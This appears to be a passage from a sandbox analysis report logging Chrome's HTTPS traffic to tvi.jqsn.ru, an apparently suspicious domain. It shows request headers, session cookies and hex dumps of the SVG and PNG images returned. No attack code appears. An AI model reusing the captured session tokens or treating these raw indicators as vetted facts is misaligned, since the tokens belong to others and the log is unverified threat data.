                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:56 UTC760INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:56 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6UW7x4pEv8ffdkU%2BnQEvTMBiZ6YsGc86BreuDKU7bqrzzrtnGAtQZMIpLK%2B1UX1LgbE%2FJyDx6YWuAAeXKnM1PzJ6LIUaFbzt4KBwPsh5MGtuSHaOTUlRnp4lAB0Bpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585502498807e2-ATL
                                                                                                                          2024-04-17 00:34:56 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                                                          Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                                                          2024-04-17 00:34:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          59192.168.2.449807104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:54 UTC1484OUTGET /st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:56 UTC768INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:56 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3nuHmdl0S09MxKN0pT%2BjF98ke9cdk4cA18qwad0dLULAGfAuP8e2PwMo2U45fchOi1Z3iGB%2BCvJ8sIKgQzxgTmZaoPzE5XMjQn4uLn5w45YAA57teDvSYD5w4tvi7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8758550218675084-ATL
                                                                                                                          2024-04-17 00:34:56 UTC601INData Raw: 33 32 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                          Data Ascii: 3274PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:56 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          60192.168.2.449809172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:54 UTC1108OUTGET /ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:55 UTC755INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:55 GMT
                                                                                                                          Content-Type: image/svg+xml
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ox0Az9kU6%2BhMrLm4KA5zm7lQQW4ql3H0flXvp%2FfCUA8WpBi1eEBgfbW92hSjjBL6Miok4ljcITUVXJ6IiDYD8FMkRsM9Eln7LM2hffwYjc%2B82%2FpO2e%2FlWhOS3WnmvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585502c97778c8-ATL
                                                                                                                          2024-04-17 00:34:55 UTC614INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                                                          Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 32 39 20 34 33 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 34 33 2e 33 31 32 35 20 31 37 2e 33 33 37 31 20 34 31 2e 30 30 35 35 20 31 34 2e 31 39 34 36 20 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 43 33 37 2e 30 36 30 37 20 35 2e 32 37 31 34 38 20 33 31 2e 31 34 37 20 30 20 32 33 2e 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20
                                                                                                                          Data Ascii: 29 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744
                                                                                                                          2024-04-17 00:34:55 UTC1369INData Raw: 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31
                                                                                                                          Data Ascii: 4.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C1
